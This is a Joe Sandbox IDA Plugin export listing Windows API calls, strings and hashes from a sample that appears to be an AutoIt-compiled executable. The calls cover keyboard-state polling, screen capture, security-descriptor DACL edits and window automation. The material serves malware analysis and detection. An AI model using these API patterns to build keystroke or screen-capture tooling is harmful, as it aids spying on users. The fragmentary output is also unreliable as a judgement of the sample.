                                          • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00ED8766
                                          • Part of subcall function 00ED874A: GetLastError.KERNEL32(?,00ED822A,?,?,?), ref: 00ED8770
                                          • Part of subcall function 00ED874A: GetProcessHeap.KERNEL32(00000008,?,?,00ED822A,?,?,?), ref: 00ED877F
                                          • Part of subcall function 00ED874A: RtlAllocateHeap.NTDLL(00000000,?,00ED822A), ref: 00ED8786
                                          • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00ED879D
                                          • Part of subcall function 00ED87E7: GetProcessHeap.KERNEL32(00000008,00ED8240,00000000,00000000,?,00ED8240,?), ref: 00ED87F3
                                          • Part of subcall function 00ED87E7: RtlAllocateHeap.NTDLL(00000000,?,00ED8240), ref: 00ED87FA
                                          • Part of subcall function 00ED87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ED8240,?), ref: 00ED880B
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ED8458
                                        • _memset.LIBCMT ref: 00ED846D
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ED848C
                                        • GetLengthSid.ADVAPI32(?), ref: 00ED849D
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00ED84DA
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ED84F6
                                        • GetLengthSid.ADVAPI32(?), ref: 00ED8513
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ED8522
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8529
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ED854A
                                        • CopySid.ADVAPI32(00000000), ref: 00ED8551
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ED8582
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ED85A8
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ED85BC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 2347767575-0
                                        • Opcode ID: fe7f76114e246ed8213e3046374da47df22d25fd00925e68dd8417e56ac08e79
                                        • Instruction ID: 3b9108c4249c061764936c63d97b23a9605cc2da2bad68b8904f5ea22e37cb1d
                                        • Opcode Fuzzy Hash: fe7f76114e246ed8213e3046374da47df22d25fd00925e68dd8417e56ac08e79
                                        • Instruction Fuzzy Hash: C0614B71900209AFDF10DFA5ED45AAEBBB9FF04314F04816AF815B7291DB319A06DF60
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00EF76A2
                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EF76AE
                                        • CreateCompatibleDC.GDI32(?), ref: 00EF76BA
                                        • SelectObject.GDI32(00000000,?), ref: 00EF76C7
                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EF771B
                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00EF7757
                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EF777B
                                        • SelectObject.GDI32(00000006,?), ref: 00EF7783
                                        • DeleteObject.GDI32(?), ref: 00EF778C
                                        • DeleteDC.GDI32(00000006), ref: 00EF7793
                                        • ReleaseDC.USER32(00000000,?), ref: 00EF779E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: 0d8c2631dc5dedb8cb6778998077c35c23dbada57827274403c75085e4fd3291
                                        • Instruction ID: 6ba96322f91c9953caa88abea549b3e04c7f11a21e4634d42e77f2a26bdd0b5e
                                        • Opcode Fuzzy Hash: 0d8c2631dc5dedb8cb6778998077c35c23dbada57827274403c75085e4fd3291
                                        • Instruction Fuzzy Hash: AF515E75904209EFCB25CFA8CC84EAEBBB9FF48310F14842DF989A7250D731A844CB50
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,00F0FB78), ref: 00EEA0FC
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00EEA11E
                                        • __swprintf.LIBCMT ref: 00EEA177
                                        • __swprintf.LIBCMT ref: 00EEA190
                                        • _wprintf.LIBCMT ref: 00EEA246
                                        • _wprintf.LIBCMT ref: 00EEA264
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 311963372-2391861430
                                        • Opcode ID: 3b8e67e72888b4875cd1840a3e735c95fe2e5e4c1cbc7b0fa15b3b767c4f1f6c
                                        • Instruction ID: 910718ba1e28899ab2263696ddf29d941ba011118c3518345a50d45273729973
                                        • Opcode Fuzzy Hash: 3b8e67e72888b4875cd1840a3e735c95fe2e5e4c1cbc7b0fa15b3b767c4f1f6c
                                        • Instruction Fuzzy Hash: 9251607190420DAACF15FBE0CD86EEEB7B8AF19304F241165F509720A1EB71AF58DB61
                                        APIs
                                          • Part of subcall function 00EA0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E86C6C,?,00008000), ref: 00EA0BB7
                                          • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E86D0D
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E86E5A
                                          • Part of subcall function 00E859CD: _wcscpy.LIBCMT ref: 00E85A05
                                          • Part of subcall function 00EA387D: _iswctype.LIBCMT ref: 00EA3885
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                        • API String ID: 537147316-1018226102
                                        • Opcode ID: ddf9c45ce436ae95047501d5e0b314379a9ac2140c9e02d825a1a5d28fcfb21c
                                        • Instruction ID: 1e098d1257753c0d52bc39760599b1aa74e48b95daddb3aa781e0b70df4139c8
                                        • Opcode Fuzzy Hash: ddf9c45ce436ae95047501d5e0b314379a9ac2140c9e02d825a1a5d28fcfb21c
                                        • Instruction Fuzzy Hash: 43028C711083419FC724EF24C881AAFBBE5AF99354F14691DF4CEA72A1DB30DA49DB42
                                        APIs
                                        • _memset.LIBCMT ref: 00E845F9
                                        • GetMenuItemCount.USER32(00F46890), ref: 00EBD7CD
                                        • GetMenuItemCount.USER32(00F46890), ref: 00EBD87D
                                        • GetCursorPos.USER32(?), ref: 00EBD8C1
                                        • SetForegroundWindow.USER32(00000000), ref: 00EBD8CA
                                        • TrackPopupMenuEx.USER32(00F46890,00000000,?,00000000,00000000,00000000), ref: 00EBD8DD
                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EBD8E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                        • String ID:
                                        • API String ID: 2751501086-0
                                        • Opcode ID: 6032841d8f4df762802bfd9536e6bc08c6aa4f4cff35378c8ba561768759cc0a
                                        • Instruction ID: 059d87070c489a07f1e652c6c18a15c362cbc9280f8329e241c701844e0d531e
                                        • Opcode Fuzzy Hash: 6032841d8f4df762802bfd9536e6bc08c6aa4f4cff35378c8ba561768759cc0a
                                        • Instruction Fuzzy Hash: 4B71E57060421ABEEB319F15DC45FEABF69FF05368F241216F618B61E0DBB15810EB94
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                        • API String ID: 3964851224-909552448
                                        • Opcode ID: a3ff92cb1cf77273963ed297fb0d0ba7e6faff169f6003a48f2725eb55a0e534
                                        • Instruction ID: 85924ce4f3aed570a893fb6e10a228deb4a364f2635edc88d7be56b56058cd7c
                                        • Opcode Fuzzy Hash: a3ff92cb1cf77273963ed297fb0d0ba7e6faff169f6003a48f2725eb55a0e534
                                        • Instruction Fuzzy Hash: 8E417C7154024E8BDF14EF90DCA1AEA37A5BF2A320F104454FD956B292DB30A91AEB60
                                        APIs
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                          • Part of subcall function 00E87A84: _memmove.LIBCMT ref: 00E87B0D
                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EE55D2
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EE55E8
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EE55F9
                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EE560B
                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EE561C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: SendString$_memmove
                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                        • API String ID: 2279737902-1007645807
                                        • Opcode ID: b3c77f9304bb68b54acd792140e05da764b92156c96a9b86a802f1604bf9d2a5
                                        • Instruction ID: 985e436b34019d2e24a5f752bb65714130bb6cd405a1dfdf20efda7e7ac85b18
                                        • Opcode Fuzzy Hash: b3c77f9304bb68b54acd792140e05da764b92156c96a9b86a802f1604bf9d2a5
                                        • Instruction Fuzzy Hash: A311E22155016D79D720B663CC8ACFF7BBCEF91F14F501469B448B20D1EE618D05CAA2
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                        • String ID: 0.0.0.0
                                        • API String ID: 208665112-3771769585
                                        • Opcode ID: 6ee2cf8f5385ed769ad4e99adb45098c4576d92258c7a63f600d5e1445728c5d
                                        • Instruction ID: c81419d2cb6ed62ae2a80404059c431a4c2d9cd590fbc0ac4f07fb245673c314
                                        • Opcode Fuzzy Hash: 6ee2cf8f5385ed769ad4e99adb45098c4576d92258c7a63f600d5e1445728c5d
                                        • Instruction Fuzzy Hash: 5C11057190411DAFCB20EB259C46EDB77ECAB85710F0011B6F504B6092EFB19A85A662
                                        APIs
                                        • timeGetTime.WINMM ref: 00EE521C
                                          • Part of subcall function 00EA0719: timeGetTime.WINMM(?,75C0B400,00E90FF9), ref: 00EA071D
                                        • Sleep.KERNEL32(0000000A), ref: 00EE5248
                                        • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00EE526C
                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00EE528E
                                        • SetActiveWindow.USER32 ref: 00EE52AD
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EE52BB
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EE52DA
                                        • Sleep.KERNEL32(000000FA), ref: 00EE52E5
                                        • IsWindow.USER32 ref: 00EE52F1
                                        • EndDialog.USER32(00000000), ref: 00EE5302
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: BUTTON
                                        • API String ID: 1194449130-3405671355
                                        • Opcode ID: 99db3ef86b03a64cce27802a2d872df3ca0e42fdcfcefe176ae6ef5b7413f9aa
                                        • Instruction ID: 1fe378077799d971ee8f4c6046e09f4d6757b4ab406bd1aef1b664c8b27b41da
                                        • Opcode Fuzzy Hash: 99db3ef86b03a64cce27802a2d872df3ca0e42fdcfcefe176ae6ef5b7413f9aa
                                        • Instruction Fuzzy Hash: BA21F67510474CAFE7106F31EC89B263B69FB2A34EF082424F901E65B5DBB19D04BB62
                                        APIs
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • CoInitialize.OLE32(00000000), ref: 00EED855
                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EED8E8
                                        • SHGetDesktopFolder.SHELL32(?), ref: 00EED8FC
                                        • CoCreateInstance.COMBASE(00F12D7C,00000000,00000001,00F3A89C,?), ref: 00EED948
                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EED9B7
                                        • CoTaskMemFree.COMBASE(?), ref: 00EEDA0F
                                        • _memset.LIBCMT ref: 00EEDA4C
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00EEDA88
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EEDAAB
                                        • CoTaskMemFree.COMBASE(00000000), ref: 00EEDAB2
                                        • CoTaskMemFree.COMBASE(00000000), ref: 00EEDAE9
                                        • CoUninitialize.COMBASE ref: 00EEDAEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                        • String ID:
                                        • API String ID: 1246142700-0
                                        • Opcode ID: c6533b61ee91cdcbc19a58f547ce00e057e075ad6de96d868aad9c888f898ec9
                                        • Instruction ID: bb59482c625d256dbd6176b0892d904fa22a7b33c876e28e8c243272b83b2042
                                        • Opcode Fuzzy Hash: c6533b61ee91cdcbc19a58f547ce00e057e075ad6de96d868aad9c888f898ec9
                                        • Instruction Fuzzy Hash: 66B1E975A00109AFDB14DFA5CC88DAEBBF9FF48314B149469E909EB251DB30EE45CB50
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00EE05A7
                                        • SetKeyboardState.USER32(?), ref: 00EE0612
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00EE0632
                                        • GetKeyState.USER32(000000A0), ref: 00EE0649
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00EE0678
                                        • GetKeyState.USER32(000000A1), ref: 00EE0689
                                        • GetAsyncKeyState.USER32(00000011), ref: 00EE06B5
                                        • GetKeyState.USER32(00000011), ref: 00EE06C3
                                        • GetAsyncKeyState.USER32(00000012), ref: 00EE06EC
                                        • GetKeyState.USER32(00000012), ref: 00EE06FA
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00EE0723
                                        • GetKeyState.USER32(0000005B), ref: 00EE0731
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: badd9aa828def223a95a1b8bc44d6a29cdd64372db683193cb4aa836a485d35b
                                        • Instruction ID: d75c2f16423d8d058da6caee4b25bd4691dc1c0452bf4e7d88e7865184d3ed30
                                        • Opcode Fuzzy Hash: badd9aa828def223a95a1b8bc44d6a29cdd64372db683193cb4aa836a485d35b
                                        • Instruction Fuzzy Hash: A251D970A047CC19FB35EBA188547EABFF49F01384F08559A95C2765C2DAE49BCCCB61
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 00EDC746
                                        • GetWindowRect.USER32(00000000,?), ref: 00EDC758
                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00EDC7B6
                                        • GetDlgItem.USER32(?,00000002), ref: 00EDC7C1
                                        • GetWindowRect.USER32(00000000,?), ref: 00EDC7D3
                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00EDC827
                                        • GetDlgItem.USER32(?,000003E9), ref: 00EDC835
                                        • GetWindowRect.USER32(00000000,?), ref: 00EDC846
                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00EDC889
                                        • GetDlgItem.USER32(?,000003EA), ref: 00EDC897
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EDC8B4
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00EDC8C1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: 26f05756d31a5252f75f4f8f0c382318d17b68849e9554ba1b74d6a6e8694bea
                                        • Instruction ID: 014e750beb16fe409623332eef42b35b069d5f770033ccc041f59de917ffe095
                                        • Opcode Fuzzy Hash: 26f05756d31a5252f75f4f8f0c382318d17b68849e9554ba1b74d6a6e8694bea
                                        • Instruction Fuzzy Hash: 3B514275B00209AFDB18CF68DD85AAEBBBAFB88310F14812DF515E7290D770AD05DB10
                                        APIs
                                          • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                                        • GetSysColor.USER32(0000000F), ref: 00E821D3
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID:
                                        • API String ID: 259745315-0
                                        • Opcode ID: 69bce86a23bb92c4649d924526b286cd48819721bde072b34026a87c78387461
                                        • Instruction ID: bf2ab0ecd9e385a8fe99921a9f3fb135e8a77d3d95539fa78d77bfbf459665aa
                                        • Opcode Fuzzy Hash: 69bce86a23bb92c4649d924526b286cd48819721bde072b34026a87c78387461
                                        • Instruction Fuzzy Hash: 4141A331104144AFDB256F68EC48BB93B65FB06335F285269FE6DAA1F2C7318C42EB51
                                        APIs
                                        • CharLowerBuffW.USER32(?,?,00F0F910), ref: 00EEAB76
                                        • GetDriveTypeW.KERNEL32(00000061,00F3A620,00000061), ref: 00EEAC40
                                        • _wcscpy.LIBCMT ref: 00EEAC6A
                                        Similarity
                                        • API ID: BuffCharDriveLowerType_wcscpy
